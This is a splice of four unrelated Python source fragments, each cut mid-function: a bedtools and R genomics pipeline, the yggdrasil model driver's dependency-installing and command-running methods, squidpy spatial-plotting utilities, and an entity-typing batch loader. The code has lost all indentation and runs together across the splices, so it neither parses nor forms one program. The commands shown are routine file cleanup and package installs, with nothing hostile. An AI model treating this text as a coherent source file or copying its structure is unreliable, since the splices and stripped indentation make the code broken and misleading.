runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph'), echo=config['genomescaninfo']['verbose'])
runcmd('rmdir --ignore-fail-on-non-empty ' + cntdir, echo=config['genomescaninfo']['verbose'])
def tabulatemeanwig(config, windowfile, genomefile, beddir, counttablefile):
if config['genomescaninfo']['verbose']:
print('==>tabulatemeanwig<==')
cntdir=tempfile.TemporaryDirectory(dir=config['resultdir']).name
for sampleinfo in config['sampleinfo']:
infile=os.path.join(beddir, sampleinfo['sampleid'] + '.bed')
covfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.genomecov.bedgraph')
makedirectory(covfile)
runcmd("bedtools genomecov -i %s -g %s -bg > %s" % (infile, genomefile, covfile), echo=config['genomescaninfo']['verbose'])
outfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph')
makedirectory(outfile)
cmd = "bedtools intersect -a %s -b %s -wo | awk -v FS='\\t' -v OFS='\\t' -e '{ print $1, $2, $3, $7*$8/%d }' | sort -k 1,1 -k 2,2n -k 3,3n | bedtools groupby -g 1,2,3 -c 4 -o sum > %s" % (windowfile, covfile, config['genomescaninfo']['windowsize'], outfile)
runcmdsh(cmd, config['genomescaninfo']['verbose'])
sampleids=[sampleinfo['sampleid'] for sampleinfo in config['sampleinfo']]
fs=[os.path.join(cntdir, id+'.bedgraph') for id in sampleids]
makedirectory(counttablefile)
runcmd("bedtools unionbedg -i %s -header -names %s | gzip -n > %s" % (' '.join(fs), ' '.join(sampleids), counttablefile), echo=config['genomescaninfo']['verbose'])
for sampleinfo in config['sampleinfo']:
runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.genomecov.bedgraph'), echo=config['genomescaninfo']['verbose'])
runcmd('rm -f ' + os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph'), echo=config['genomescaninfo']['verbose'])
runcmd('rmdir --ignore-fail-on-non-empty ' + cntdir, echo=config['genomescaninfo']['verbose'])
def swapdict(d):
nd = {}
for k, v in d.items():
if v in nd:
nd[v].append(k)
else:
nd[v]=[k]
return nd
def ttest(config, statfile, counttablefile, testfile):
if config['dhmrinfo']['verbose']:
print('==>t.test<==')
sampleid2group={sampleinfo['sampleid']:sampleinfo['group'] for sampleinfo in config['sampleinfo']}
group2sampleid=swapdict(sampleid2group)
group1=group2sampleid[config['groupinfo']['group1']]
group2=group2sampleid[config['groupinfo']['group2']]
g1str = 'c(' + ', '.join(["'" + name + "'" for name in group1]) + ')'
g2str = 'c(' + ', '.join(["'" + name + "'" for name in group2]) + ')'
adjscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'p.adj.R')
rscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'ttest.R')
cmd = "R --slave --no-save --no-restore --no-init-file -e \"numthreads=%s\" -e \"nsplit=%s\" -e \"infile='%s'\" -e \"sf_file='%s'\" -e \"mindepth=%d\" -e \"group1=%s\" -e \"group2=%s\" -e \"outfile='%s'\" -e \"keepNA=%s\" -e \"source('%s')\" -e \"source('%s')\"" % (
config['dhmrinfo']['numthreads'], config['dhmrinfo']['nsplit'], counttablefile, statfile, config['dhmrinfo']['meandepth']*(len(group1)+len(group2)), g1str, g2str, testfile, 'T' if config['dhmrinfo']['keepNA'] else 'F', adjscript, rscript
)
runcmdsh(cmd, echo=config['dhmrinfo']['verbose'])
def chisq(config, statfile, counttablefile, testfile):
if config['dhmrinfo']['verbose']:
print('==>chisq.test<==')
sampleid2group={sampleinfo['sampleid']:sampleinfo['group'] for sampleinfo in config['sampleinfo']}
group2sampleid=swapdict(sampleid2group)
group1=group2sampleid[config['groupinfo']['group1']]
group2=group2sampleid[config['groupinfo']['group2']]
g1str = 'c(' + ', '.join(["'" + name + "'" for name in group1]) + ')'
g2str = 'c(' + ', '.join(["'" + name + "'" for name in group2]) + ')'
adjscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', 'p.adj.R')
rscript=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'R', | |
args=self.args,
function=self.function,
is_server=self.is_server,
client_of=self.client_of,
inputs=self.inputs,
outputs=self.outputs,
iter_function_over=self.iter_function_over,
copies=self.copies)
self.preparsed_function = self.preparse_function(yml_mock)
self.model_function_info = self.preparsed_function['model_file']
self.model_function_file = self.model_function_info['model_file']
self.model_function_inputs = self.preparsed_function['inputs']
self.model_function_outputs = self.preparsed_function['outputs']
self.model_outputs_in_inputs = self.preparsed_function['outputs_in_inputs']
model_dir, model_base = os.path.split(self.model_function_file)
model_base = os.path.splitext(model_base)[0]
wrapper_fname = os.path.join(model_dir,
'ygg_%s_%s%s' % (model_base, self.name,
self.language_ext[0]))
lines = self.write_model_wrapper(model_name=self.name,
**self.preparsed_function)
# Write file
if (not os.path.isfile(wrapper_fname)) or self.overwrite:
with open(wrapper_fname, 'w') as fd:
fd.write('\n'.join(lines))
return wrapper_fname
@property
def numeric_logging_level(self):
r"""int: Logging level for the model."""
out = self.logger.getEffectiveLevel()
if self.logging_level:
out = logging.getLevelName(self.logging_level)
return out
@property
def n_sent_messages(self):
r"""dict: Number of messages sent by the model via each connection."""
if (self._mpi_rank > 0) and self.check_mpi_request('stopped'):
out = self._mpi_requests['stopped'].result
return out
out = {}
for x in self.yml.get('output_drivers', []):
x_inst = x.get('instance', None)
if x_inst:
out[x_inst.name] = x_inst.models_recvd.get(self.name, 0)
if self.is_server:
for x in self.yml.get('input_drivers', []):
x_inst = x.get('instance', None)
if x_inst and (x_inst._connection_type == 'rpc_request'):
out[x_inst.name] = x_inst.servers_recvd.get(self.name, 0)
return out
@property
def has_sent_messages(self):
r"""bool: True if output has been received from the model."""
n_msg = self.n_sent_messages
if not n_msg:
return True
return bool(sum(n_msg.values()))
def write_wrappers(self, **kwargs):
r"""Write any wrappers needed to compile and/or run a model.
Args:
**kwargs: Keyword arguments are ignored (only included to
allow cascade from child classes).
Returns:
list: Full paths to any created wrappers.
"""
return []
@classmethod
def install_model_dependencies(cls, dependencies, always_yes=False):
r"""Install any dependencies required by the model.
Args:
dependencies (list): Dependencies that should be installed.
always_yes (bool, optional): If True, the package manager will
not ask users for input during installation. Defaults to
False.
"""
packages = {}
for x in dependencies:
if isinstance(x, str):
x = {'package': x}
if x.get('arguments', None):
cls.install_dependency(always_yes=always_yes, **x)
else:
packages.setdefault(x.get('package_manager', None), [])
packages[x.get('package_manager', None)].append(
x['package'])
for k, v in packages.items():
cls.install_dependency(v, package_manager=k,
always_yes=always_yes)
@classmethod
def install_dependency(cls, package=None, package_manager=None,
arguments=None, command=None, always_yes=False):
r"""Install a dependency.
Args:
package (str): Name of the package that should be installed. If
the package manager supports it, this can include version
requirements.
package_manager (str, optional): Package manager that should be
used to install the package.
arguments (str, optional): Additional arguments that should be
passed to the package manager.
command (list, optional): Command that should be used to
install the package.
always_yes (bool, optional): If True, the package manager will
not ask users for input during installation. Defaults to
False.
"""
assert(package)
if isinstance(package, str):
package = package.split()
if package_manager is None:
if tools.get_conda_prefix():
package_manager = 'conda'
elif platform._is_mac:
package_manager = 'brew'
elif platform._is_linux:
package_manager = 'apt'
elif platform._is_win:
package_manager = 'choco'
yes_cmd = []
cmd_kwargs = {}
if command:
cmd = copy.copy(command)
elif package_manager == 'conda':
cmd = ['conda', 'install'] + package
if platform._is_win: # pragma: windows
# Conda commands must be run on the shell on windows as it
# is implemented as a batch script
cmd.insert(0, 'call')
cmd_kwargs['shell'] = True
yes_cmd = ['-y']
elif package_manager == 'brew':
cmd = ['brew', 'install'] + package
elif package_manager == 'apt':
cmd = ['apt-get', 'install'] + package
if bool(os.environ.get('GITHUB_ACTIONS', False)):
# Only enable sudo for testing, otherwise allow the user to
# decide if they want to run yggdrasil with sudo, or just
# install the dependencies themselves
cmd.insert(0, 'sudo')
yes_cmd = ['-y']
elif package_manager == 'choco':
cmd = ['choco', 'install'] + package
elif package_manager == 'vcpkg':
cmd = ['vcpkg.exe', 'install', '--triplet', 'x64-windows']
cmd += package
else:
package_managers = {'pip': 'python',
'cran': 'r'}
if package_manager in package_managers:
drv = import_component(
'model', package_managers[package_manager])
return drv.install_dependency(
package=package, package_manager=package_manager,
arguments=arguments, always_yes=always_yes)
raise NotImplementedError(f"Unsupported package manager: "
f"{package_manager}")
if arguments:
cmd += arguments.split()
if always_yes:
cmd += yes_cmd
if cmd_kwargs.get('shell', False):
cmd = ' '.join(cmd)
subprocess.check_call(cmd, **cmd_kwargs)
def model_command(self):
r"""Return the command that should be used to run the model.
Returns:
list: Any commands/arguments needed to run the model from the
command line.
"""
return [self.model_file] + self.model_args
@classmethod
def language_executable(cls, **kwargs):
r"""Command required to compile/run a model written in this language
from the command line.
Returns:
str: Name of (or path to) compiler/interpreter executable required
to run the compiler/interpreter from the command line.
"""
if cls.no_executable:
return ''
raise NotImplementedError("language_executable not implemented for '%s'"
% cls.language)
@classmethod
def executable_command(cls, args, unused_kwargs=None, **kwargs):
r"""Compose a command for running a program using the exectuable for
this language (compiler/interpreter) with the provided arguments.
Args:
args (list): The program that returned command should run and any
arguments that should be provided to it.
unused_kwargs (dict, optional): Existing dictionary that unused
keyword arguments should be added to. Defaults to None and is
ignored.
**kwargs: Additional keyword arguments are ignored.
Returns:
list: Arguments composing the command required to run the program
from the command line using the executable for this language.
"""
raise NotImplementedError("executable_command not implemented for '%s'"
% cls.language)
@classmethod
def run_executable(cls, args, return_process=False, debug_flags=None,
**kwargs):
r"""Run a program using the executable for this language and the
provided arguments.
Args:
args (list): The program that should be run and any arguments
that should be provided to it.
return_process (bool, optional): If True, the process class is
returned without checking the process output. If False,
communicate is called on the process and the output is parsed
for errors. Defaults to False.
debug_flags (list, optional): Debug executable and flags that should
be prepended to the executable command. Defaults to None and
is ignored.
**kwargs: Additional keyword arguments are passed to
cls.executable_command and tools.popen_nobuffer.
Returns:
str: Output to stdout from the run command if return_process is
False, the process if return_process is True.
Raises:
RuntimeError: If the language is not installed.
RuntimeError: If there is an error when running the command.
"""
unused_kwargs = {}
cmd = cls.executable_command(args, unused_kwargs=unused_kwargs, **kwargs)
if isinstance(debug_flags, list):
cmd = debug_flags + cmd
try:
# Add default keyword arguments
if 'working_dir' in unused_kwargs:
unused_kwargs.setdefault('cwd', unused_kwargs.pop('working_dir'))
unused_kwargs.setdefault('shell', platform._is_win)
# Call command
logger.debug("Running '%s' from %s"
% (' '.join(cmd), unused_kwargs.get('cwd', os.getcwd())))
logger.debug("Process keyword arguments:\n%s\n",
' ' + pformat(unused_kwargs).replace('\n', '\n '))
print(' '.join(cmd))
proc = tools.popen_nobuffer(cmd, **unused_kwargs)
if return_process:
return proc
out, err = proc.communicate()
if proc.returncode != 0:
if out:
logger.info('\n%s' % out.decode('utf-8'))
if err: # pragma: debug
logger.info('\n%s' % err.decode('utf-8'))
raise RuntimeError("Command '%s' failed with code %d."
% (' '.join(cmd), proc.returncode))
out = out.decode("utf-8")
logger.debug('%s\n%s' % (' '.join(cmd), out))
return out
except (subprocess.CalledProcessError, OSError) as e: # pragma: debug
raise RuntimeError("Could not call command '%s': %s"
% (' '.join(cmd), e))
def run_validation(self):
r"""Run the validation script for the model."""
if not self.validation_command:
return
subprocess.check_call(self.validation_command.split(),
cwd=self.working_dir)
def run_model(self, return_process=True, **kwargs):
r"""Run the model. Unless overridden, the model will be run using
run_executable.
Args:
return_process (bool, optional): If True, the process running
the model is returned. If False, the process will block until
the model finishes running. Defaults to True.
**kwargs: Keyword arguments are passed to run_executable.
"""
env = self.set_env()
command = self.model_command()
if self.with_strace or self.with_valgrind:
kwargs.setdefault('debug_flags', self.debug_flags)
self.debug('Working directory: %s', self.working_dir)
self.debug('Command: %s', ' '.join(command))
self.debug('Environment Variables:\n%s', self.pprint(env, block_indent=1))
# Update keywords
# NOTE: Setting forward_signals to False allows faster debugging
# but should not be used in deployment for cases where models are not
# running locally.
default_kwargs = dict(env=env, working_dir=self.working_dir,
forward_signals=False,
shell=platform._is_win)
for k, v in default_kwargs.items():
kwargs.setdefault(k, v)
return self.run_executable(command, return_process=return_process, **kwargs)
@property
def debug_flags(self):
r"""list: Flags that should be prepended to an executable command to
enable debugging."""
pre_args = []
if self.with_strace:
if platform._is_linux:
pre_args += ['strace'] + self.strace_flags
else: # pragma: debug
raise RuntimeError("strace not supported on this OS.")
# TODO: dtruss cannot be run without sudo, sudo cannot be
# added to the model process command if it is not in the original
# yggdrasil CLI call, and must be tested with an executable that
# is not "signed with restricted entitlements" (which most built-in
# utilities (e.g. sleep) are).
# elif platform._is_mac:
# if 'sudo' in sys.argv:
# pre_args += ['sudo']
# pre_args += ['dtruss']
elif self.with_valgrind:
pre_args += ['valgrind'] + self.valgrind_flags
return pre_args
| |
from __future__ import annotations
from copy import copy
from types import MappingProxyType
from typing import (
Any,
List,
Type,
Tuple,
Union,
Mapping,
Optional,
Sequence,
NamedTuple,
TYPE_CHECKING,
)
from numbers import Number
from functools import partial
from typing_extensions import Literal
from matplotlib_scalebar.scalebar import ScaleBar
import itertools
from scanpy import logging as logg
from anndata import AnnData
from scanpy._settings import settings as sc_settings
from scanpy.plotting._tools.scatterplots import _add_categorical_legend
from pandas.api.types import CategoricalDtype
from pandas.core.dtypes.common import is_categorical_dtype
import numpy as np
import pandas as pd
import dask.array as da
from matplotlib import colors, pyplot as plt, rcParams, patheffects
from matplotlib.cm import get_cmap
from matplotlib.axes import Axes
from matplotlib.colors import (
Colormap,
Normalize,
TwoSlopeNorm,
ColorConverter,
ListedColormap,
)
from matplotlib.figure import Figure
from matplotlib.patches import Circle, Polygon, Rectangle
from matplotlib.gridspec import GridSpec
from matplotlib.collections import Collection, PatchCollection
from skimage.util import map_array
from skimage.color import label2rgb
from skimage.morphology import square, erosion
from skimage.segmentation import find_boundaries
from squidpy._utils import NDArrayA
from squidpy.pl._utils import _assert_value_in_obs
from squidpy.im._coords import CropCoords
from squidpy.pl._color_utils import _get_palette, _maybe_set_colors
from squidpy._constants._constants import ScatterShape
from squidpy._constants._pkg_constants import Key
_AvailShapes = Literal["circle", "square", "hex"]
Palette_t = Optional[Union[str, ListedColormap]]
_Normalize = Union[Normalize, Sequence[Normalize]]
_SeqStr = Union[str, Sequence[str]]
_SeqFloat = Union[float, Sequence[float]]
_SeqArray = Union[NDArrayA, Sequence[NDArrayA]]
_CoordTuple = Tuple[int, int, int, int]
_FontWeight = Literal["light", "normal", "medium", "semibold", "bold", "heavy", "black"]
_FontSize = Literal["xx-small", "x-small", "small", "medium", "large", "x-large", "xx-large"]
# named tuples
class FigParams(NamedTuple):
"""Figure params."""
fig: Figure
ax: Axes
axs: Sequence[Axes] | None
iter_panels: Tuple[Sequence[Any], Sequence[Any]]
title: _SeqStr | None
ax_labels: Sequence[str]
frameon: bool | None
class CmapParams(NamedTuple):
"""Cmap params."""
cmap: Colormap
img_cmap: Colormap
norm: Normalize
class OutlineParams(NamedTuple):
"""Outline params."""
outline: bool
gap_size: float
gap_color: str
bg_size: float
bg_color: str
class ScalebarParams(NamedTuple):
"""Scalebar params."""
scalebar_dx: Sequence[float] | None
scalebar_units: _SeqStr | None
class ColorParams(NamedTuple):
"""Color params."""
shape: _AvailShapes | None
color: Sequence[str | None]
groups: Sequence[str] | None
alpha: float
img_alpha: float
use_raw: bool
class SpatialParams(NamedTuple):
"""Color params."""
library_id: Sequence[str]
scale_factor: Sequence[float]
size: Sequence[float]
img: Sequence[NDArrayA] | Tuple[None, ...]
segment: Sequence[NDArrayA] | Tuple[None, ...]
cell_id: Sequence[NDArrayA] | Tuple[None, ...]
to_hex = partial(colors.to_hex, keep_alpha=True)
def _get_library_id(
adata: AnnData,
shape: _AvailShapes | None,
spatial_key: str = Key.uns.spatial,
library_id: Sequence[str] | None = None,
library_key: str | None = None,
) -> Sequence[str]:
if shape is not None:
library_id = Key.uns.library_id(adata, spatial_key, library_id, return_all=True)
if library_id is None:
raise ValueError(f"Could not fetch `library_id`, check that `spatial_key: {spatial_key}` is correct.")
return library_id
if library_key is not None:
if library_key not in adata.obs:
raise KeyError(f"`library_key: {library_key}` not in `adata.obs`.")
if library_id is None:
library_id = adata.obs[library_key].cat.categories.tolist()
_assert_value_in_obs(adata, key=library_key, val=library_id)
if isinstance(library_id, str):
library_id = [library_id]
return library_id
if library_id is None:
logg.warning("Please specify a valid `library_id` or set it permanently in `adata.uns['spatial']`")
library_id = [""] # dummy value to maintain logic of number of plots (nplots=library_id*color)
elif isinstance(library_id, list): # get library_id from arg
pass
elif isinstance(library_id, str):
library_id = [library_id]
else:
raise TypeError(f"Invalid `library_id`: {library_id}.")
return library_id
def _get_image(
adata: AnnData,
library_id: Sequence[str],
spatial_key: str = Key.obsm.spatial,
img: bool | _SeqArray | None = None,
img_res_key: str | None = None,
img_channel: int | List[int] | None = None,
img_cmap: Colormap | str | None = None,
) -> Union[Sequence[NDArrayA], Tuple[None, ...]]:
from squidpy.pl._utils import _to_grayscale
if isinstance(img, (list, np.ndarray, da.Array)):
img = _get_list(img, _type=(np.ndarray, da.Array), ref_len=len(library_id), name="img")
else:
image_mapping = Key.uns.library_mapping(adata, spatial_key, Key.uns.image_key, library_id)
if img_res_key is None:
img_res_key = _get_unique_map(image_mapping)[0]
elif img_res_key not in _get_unique_map(image_mapping):
raise KeyError(
f"Image key: `{img_res_key}` does not exist. Available image keys: `{image_mapping.values()}`"
)
img = [adata.uns[Key.uns.spatial][i][Key.uns.image_key][img_res_key] for i in library_id]
if img_channel is None:
img = [im[..., :3] for im in img]
elif isinstance(img_channel, int):
img = [im[..., [img_channel]] for im in img]
elif isinstance(img_channel, list):
img = [im[..., img_channel] for im in img]
else:
raise TypeError(f"Expected image channel to be either `int` or `None`, found `{type(img_channel).__name__}`.")
if img_cmap == "gray":
img = [_to_grayscale(im) for im in img]
return img
def _get_segment(
adata: AnnData,
library_id: Sequence[str],
seg_cell_id: str | None = None,
library_key: str | None = None,
seg: _SeqArray | bool | None = None,
seg_key: str | None = None,
) -> Tuple[Sequence[NDArrayA], Sequence[NDArrayA]] | Tuple[Tuple[None, ...], Tuple[None, ...]]:
if seg_cell_id not in adata.obs:
raise ValueError(f"Cell id `{seg_cell_id!r}` not found in `adata.obs`.")
cell_id_vec = adata.obs[seg_cell_id].values
if library_key not in adata.obs:
raise ValueError(f"Library key `{library_key}` not found in `adata.obs`.")
if not np.issubdtype(cell_id_vec.dtype, np.integer):
raise ValueError(f"Invalid type `{cell_id_vec.dtype}` for `adata.obs[{seg_cell_id!r}]`.")
cell_id_vec = [cell_id_vec[adata.obs[library_key] == lib] for lib in library_id]
if isinstance(seg, (list, np.ndarray, da.Array)):
img_seg = _get_list(seg, _type=(np.ndarray, da.Array), ref_len=len(library_id), name="img_seg")
else:
img_seg = [adata.uns[Key.uns.spatial][i][Key.uns.image_key][seg_key] for i in library_id]
return img_seg, cell_id_vec
def _get_scalefactor_size(
adata: AnnData,
library_id: Sequence[str],
spatial_key: str = Key.obsm.spatial,
img_res_key: str | None = None,
scale_factor: _SeqFloat | None = None,
size: _SeqFloat | None = None,
size_key: str | None = Key.uns.size_key,
) -> Tuple[Sequence[float], Sequence[float]]:
try:
scalefactor_mapping = Key.uns.library_mapping(adata, spatial_key, Key.uns.scalefactor_key, library_id)
scalefactors = _get_unique_map(scalefactor_mapping)
except KeyError as e:
scalefactors = None
logg.debug(f"Setting `scalefactors={scalefactors}`, reason: `{e}`")
if scalefactors is not None and img_res_key is not None:
if scale_factor is None: # get intersection of scale_factor and match to img_res_key
scale_factor_key = [i for i in scalefactors if img_res_key in i]
if not len(scale_factor_key):
raise ValueError(f"No `scale_factor` found that could match `img_res_key`: {img_res_key}.")
_scale_factor_key = scale_factor_key[0] # get first scale_factor
scale_factor = [
adata.uns[Key.uns.spatial][i][Key.uns.scalefactor_key][_scale_factor_key] for i in library_id
]
else: # handle case where scale_factor is float or list
scale_factor = _get_list(scale_factor, _type=float, ref_len=len(library_id), name="scale_factor")
if size_key not in scalefactors and size is None:
raise ValueError(
f"Specified `size_key: {size_key}` does not exist and size is `None`, "
f"available keys are: `{scalefactors}`. Specify a valid `size_key` or `size`."
)
if size is None:
size = 1.0
size = _get_list(size, _type=Number, ref_len=len(library_id), name="size")
if not (len(size) == len(library_id) == len(scale_factor)):
raise ValueError("Len of `size`, `library_id` and `scale_factor` do not match.")
size = [
adata.uns[Key.uns.spatial][i][Key.uns.scalefactor_key][size_key] * s * sf * 0.5
for i, s, sf in zip(library_id, size, scale_factor)
]
return scale_factor, size
scale_factor = 1.0 if scale_factor is None else scale_factor
scale_factor = _get_list(scale_factor, _type=float, ref_len=len(library_id), name="scale_factor")
size = 120000 / adata.shape[0] if size is None else size
size = _get_list(size, _type=Number, ref_len=len(library_id), name="size")
return scale_factor, size
def _image_spatial_attrs(
adata: AnnData,
shape: _AvailShapes | None = None,
spatial_key: str = Key.obsm.spatial,
library_id: Sequence[str] | None = None,
library_key: str | None = None,
img: bool | _SeqArray | None = None,
img_res_key: str | None = Key.uns.image_res_key,
img_channel: int | List[int] | None = None,
seg: _SeqArray | bool | None = None,
seg_key: str | None = None,
cell_id_key: str | None = None,
scale_factor: _SeqFloat | None = None,
size: _SeqFloat | None = None,
size_key: str | None = Key.uns.size_key,
img_cmap: Colormap | str | None = None,
) -> SpatialParams:
def truthy(img: bool | NDArrayA | _SeqArray | None) -> bool:
if img is None or img is False:
return False
return img is True or len(img) # type: ignore
library_id = _get_library_id(
adata=adata, shape=shape, spatial_key=spatial_key, library_id=library_id, library_key=library_key
)
if len(library_id) > 1 and library_key is None:
raise ValueError(
f"Found `library_id: `{library_id} but no `library_key` was specified. Please specify `library_key`."
)
scale_factor, size = _get_scalefactor_size(
adata=adata,
spatial_key=spatial_key,
library_id=library_id,
img_res_key=img_res_key,
scale_factor=scale_factor,
size=size,
size_key=size_key,
)
if (truthy(img) and truthy(seg)) or (truthy(img) and shape is not None):
_img = _get_image(
adata=adata,
spatial_key=spatial_key,
library_id=library_id,
img=img,
img_res_key=img_res_key,
img_channel=img_channel,
img_cmap=img_cmap,
)
else:
_img = (None,) * len(library_id)
if truthy(seg):
_seg, _cell_vec = _get_segment(
adata=adata,
library_id=library_id,
seg_cell_id=cell_id_key,
library_key=library_key,
seg=seg,
seg_key=seg_key,
)
else:
_seg = (None,) * len(library_id)
_cell_vec = (None,) * len(library_id)
return SpatialParams(library_id, scale_factor, size, _img, _seg, _cell_vec)
def _set_coords_crops(
adata: AnnData,
spatial_params: SpatialParams,
spatial_key: str,
crop_coord: Sequence[_CoordTuple] | _CoordTuple | None = None,
) -> Tuple[List[NDArrayA], List[CropCoords] | List[None]]:
if crop_coord is None:
crops = [None] * len(spatial_params.library_id)
else:
crop_coord = _get_list(crop_coord, _type=tuple, ref_len=len(spatial_params.library_id), name="crop_coord")
crops = [CropCoords(*cr) * sf for cr, sf in zip(crop_coord, spatial_params.scale_factor)] # type: ignore[misc]
coords = adata.obsm[spatial_key]
return [coords * sf for sf in spatial_params.scale_factor], crops # TODO(giovp): refactor with _subs
def _subs(
adata: AnnData,
coords: NDArrayA,
img: NDArrayA | None = None,
library_key: str | None = None,
library_id: str | None = None,
crop_coords: CropCoords | None = None,
groups_key: str | None = None,
groups: Sequence[Any] | None = None,
) -> | |
elif args.goal == 'ufet':
self.word2id = transformer_constant.ANS2ID_DICT_UFET
else:
print('ERROR: Invalid input... ' + args.goal)
raise
self.tokenizer = tokenizer
self.do_lower = args.do_lower
self.context_window_size = args.context_window_size
self.args = args
def _load_npz(self, path):
with open(path, 'rb') as f:
data = np.load(f)
return data
def _load_shard(self):
lines = self.data
ex_ids = list(range(len(lines)))
mention_word_pos1 = [line['pos']['sent1']["word"].split() if not self.do_lower
else line['pos']['sent1']["word"].lower().split() for line in lines]
left_seq_pos1 = [line['pos']['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['pos']['sent1']['left_context']][-self.context_window_size:] for line in lines]
right_seq_pos1 = [line['pos']['sent1']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['pos']['sent1']['right_context']][:self.context_window_size] for line in lines]
mention_word_pos2 = [line['pos']['sent2']["word"].split() if not self.do_lower
else line['pos']['sent2']["word"].lower().split() for line in lines]
left_seq_pos2 = [line['pos']['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['pos']['sent2']['left_context']][-self.context_window_size:] for line in lines]
right_seq_pos2 = [line['pos']['sent2']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['pos']['sent2']['right_context']][:self.context_window_size] for line in lines]
mention_word_neg1 = [line['neg']['sent1']["word"].split() if not self.do_lower
else line['neg']['sent1']["word"].lower().split() for line in lines]
left_seq_neg1 = [line['neg']['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['neg']['sent1']['left_context']][-self.context_window_size:] for line in lines]
right_seq_neg1 = [line['neg']['sent1']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['neg']['sent1']['right_context']][:self.context_window_size] for line in lines]
mention_word_neg2 = [line['neg']['sent2']["word"].split() if not self.do_lower
else line['neg']['sent2']["word"].lower().split() for line in lines]
left_seq_neg2 = [line['neg']['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['neg']['sent2']['left_context']][-self.context_window_size:] for line
in lines]
right_seq_neg2 = [line['neg']['sent2']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['neg']['sent2']['right_context']][:self.context_window_size] for
line in lines]
# Ddebug
if False:
idx = 0
print('ex_ids: ', ex_ids[idx])
print('left_seq: ', left_seq[idx])
print('right_seq: ', right_seq[idx])
print('mention_word: ', mention_word[idx])
print(
'0) ex_ids:', len(ex_ids),
'1) left_seq_pos1:', len(left_seq_pos1), '2) right_seq+pos1:', len(right_seq_pos1), '3) mention_word_pos1:',
len(mention_word_pos1), '4) left_seq_pos2:', len(left_seq_pos2), '5) right_seq_pos2:', len(right_seq_pos2),
'6) mention_word_pos2:', len(mention_word_pos2), '7) left_seq_neg1:', len(left_seq_neg1), '8) right_seq_neg1:',
len(right_seq_neg1), '9) mention_word_neg1:', len(mention_word_neg1), '10) left_seq_neg2:', len(left_seq_neg2),
'11) right_seq_neg2:', len(right_seq_neg2), '12) mention_word_neg2:', len(mention_word_neg2)
)
return zip(ex_ids, left_seq_pos1, right_seq_pos1, mention_word_pos1,
left_seq_pos2, right_seq_pos2, mention_word_pos2,
left_seq_neg1, right_seq_neg1, mention_word_neg1,
left_seq_neg2, right_seq_neg2, mention_word_neg2)
def _get_sentence(self, epoch):
for i in range(0, epoch):
ids = self._load_shard()
#print('ids', list(ids))
for current_ids in ids:
yield current_ids
def get_batch(self, batch_size, max_len, epoch, eval_data=True):
return get_type_reduction_example(
self._get_sentence(epoch), batch_size=batch_size, max_len=max_len,
eval_data=eval_data, tokenizer=self.tokenizer, answer_num=transformer_constant.ANSWER_NUM_DICT[self.args.goal]
)
def get_type_reduction_LR_example(generator, batch_size, max_len, eval_data=False, tokenizer=None):
# [cur_stream elements]
# 0: example id, 1: left context_pos1, 2: right context_pos1, 3: mention word_pos1,
# 4: left context_pos2, 5: right context_pos2, 6: mention word_pos2,
# 7: labels
cur_stream = [None] * batch_size
no_more_data = False
while True:
bsz = batch_size
seq_length = max_len
mention_length_limit = 10 # in words, not word pieces
for i in range(batch_size):
try:
cur_stream[i] = list(next(generator))
except StopIteration:
no_more_data = True
bsz = i
break
if no_more_data and bsz == 0:
break
ex_ids = np.zeros([bsz], np.object)
targets = np.zeros([bsz], np.float32)
inputs_sent1 = []
inputs_sent2 = []
sentence_len_wp_sent1 = []
sentence_len_wp_sent2 = []
for i in range(bsz):
ex_ids[i] = cur_stream[i][0]
# sent1
left_seq_sent1 = cur_stream[i][1]
right_seq_sent1 = cur_stream[i][2]
mention_seq_sent1 = cur_stream[i][3]
if len(mention_seq_sent1) > mention_length_limit:
mention_seq_sent1 = mention_seq_sent1[:mention_length_limit]
mention_sent1 = ' '.join(mention_seq_sent1)
context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1)
len_after_tokenization1 = len(tokenizer.encode_plus(mention_sent1, context_sent1)['input_ids'])
if len_after_tokenization1 > max_len:
overflow_len1 = len_after_tokenization1 - max_len
context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1[:-overflow_len1])
inputs_sent1.append([mention_sent1, context_sent1])
sentence_len_wp_sent1.append(len_after_tokenization1)
# sent2
left_seq_sent2 = cur_stream[i][4]
right_seq_sent2 = cur_stream[i][5]
mention_seq_sent2 = cur_stream[i][6]
if len(mention_seq_sent2) > mention_length_limit:
mention_seq_sent2 = mention_seq_sent2[:mention_length_limit]
mention_sent2 = ' '.join(mention_seq_sent2)
context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2)
len_after_tokenization2 = len(tokenizer.encode_plus(mention_sent2, context_sent2)['input_ids'])
if len_after_tokenization2 > max_len:
overflow_len2 = len_after_tokenization2 - max_len
context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2[:-overflow_len2])
inputs_sent2.append([mention_sent2, context_sent2])
sentence_len_wp_sent2.append(len_after_tokenization2)
# label
targets[i] = cur_stream[i][7]
# sent1
max_len_in_batch_sent1 = max(sentence_len_wp_sent1)
inputs_sent1 = tokenizer.batch_encode_plus(
inputs_sent1,
add_special_tokens=True,
max_length=min(max_len, max_len_in_batch_sent1),
truncation_strategy='only_second',
pad_to_max_length=True,
return_tensors='pt'
)
# sent2
max_len_in_batch_sent2 = max(sentence_len_wp_sent2)
inputs_sent2 = tokenizer.batch_encode_plus(
inputs_sent2,
add_special_tokens=True,
max_length=min(max_len, max_len_in_batch_sent2),
